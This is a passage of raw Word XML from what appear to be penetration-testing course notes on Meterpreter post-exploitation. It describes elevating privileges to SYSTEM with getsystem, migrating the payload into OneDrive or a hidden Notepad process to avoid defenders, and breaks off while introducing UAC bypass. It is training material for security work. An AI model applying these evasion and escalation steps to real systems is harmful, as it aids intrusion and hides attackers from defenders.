      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SeImpersonatePrivilege</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> assigned. Now, let's use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getsystem</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to attempt to elevate our privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000538">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4757738" cy="1456295"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="261" name="image246.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image246.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId99"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4757738" cy="1456295"/>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after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 61 shows that getsystem successfully elevated our privileges to NT AUTHORITY\SYSTEM by using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Named Pipe Impersonation (PrintSpooler variant)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as we did manually in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Privilege Escalation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000053A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000053B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">migrate </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000053C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Migrating is the process of hiding our reverse shell within another process since if we don't, then blue team can easily see our reverse shell process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000053D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When we compromise a host, our Meterpreter payload is executed inside the process of the application we attack or execute our payload. If the victim closes that process, our access to the machine is closed as well. In addition, depending on how the Windows binary file containing the Meterpreter payload is named, the process name may be suspicious if a defender is searching through the process list. We can use migrate to move the execution of our Meterpreter payload to a different process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000053E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's view all running processes by entering </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the Meterpreter command prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000053F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2806700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="175" name="image171.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image171.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId100"/>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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 62 shows that the process </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">met.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has the process ID 2552. The name and path will easily make the process stand out to a defender reviewing the process list. The output shows that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> started a process related to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OneDrive</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with process ID 8052. If our payload runs within this process, it is far less likely to be detected by reviewing the process list.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000541">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We should note that we are only able to migrate into processes that execute at the same (or lower)</w:t>
      </w:r>
      <w:hyperlink r:id="rId101">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId102">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">integrity and privilege level</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> than that of our current process. In the context of this example, we already elevated our privileges to NT AUTHORITY\SYSTEM so our choices are plentiful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000542">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">migrate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command returns the error </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Error while running command migrate: undefined method `pid' for nil</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, make sure Metasploit is updated to the latest version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000543">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's migrate our current process to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OneDrive.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by entering </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">migrate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the process ID we want to migrate to.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000544">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4605338" cy="3133747"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61" name="image60.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image60.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId103"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4605338" cy="3133747"/>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 63 shows that we successfully migrated our process to the OneDrive process. When reviewing the process list, we'll find our original process, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">met.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with ID 2552, does not exist anymore. Furthermore, we'll notice that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> output contains less information than before. The reason for this is that we are now running in the context of the process with the ID 8052 and therefore, as user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000546">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="889000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="93" name="image85.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image85.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId104"/>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after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead of migrating to an existing process or a situation in which we won't find any suitable processes to migrate to, we can use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">execute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Meterpreter command. This command provides the ability to create a new process by specifying a command or program.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000548">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To demonstrate this, let's start a hidden Notepad process and migrate to it as user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. For this, we use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">execute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-H</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create the process hidden from view and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">notepad</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">_ as argument for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-f</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to specify the command or program to run. Then, we migrate to the newly spawned process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000549">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4338638" cy="1592224"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="257" name="image245.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image245.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId105"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4338638" cy="1592224"/>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pacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 65 shows how we can migrate to the newly spawned Notepad process. Since we used the option </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-H</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the Notepad process was spawned without any visual representation. However, the process is still listed in the process list of applications such as the task manager.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000054B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000054C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These are some Post-Exploitation </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Features. Next, we will learn about Post-Exploitation </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000054D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000054E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x2kzg1h8oewb" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-Exploitation Modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000054F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (21.3.2. Post-Exploitation Modules)</w:t>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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sessions that were created through attack vectors such as the execution of a client-side attack will likely provide us only with an unprivileged shell. But if the target user is a member of the local administrators group, we can elevate our shell to a high integrity level if we can bypass</w:t>
      </w:r>
      <w:hyperlink r:id="rId106">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId107">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">User Account Control</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (UAC).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000552">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the previous section, we migrated our Meterpreter shell to a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
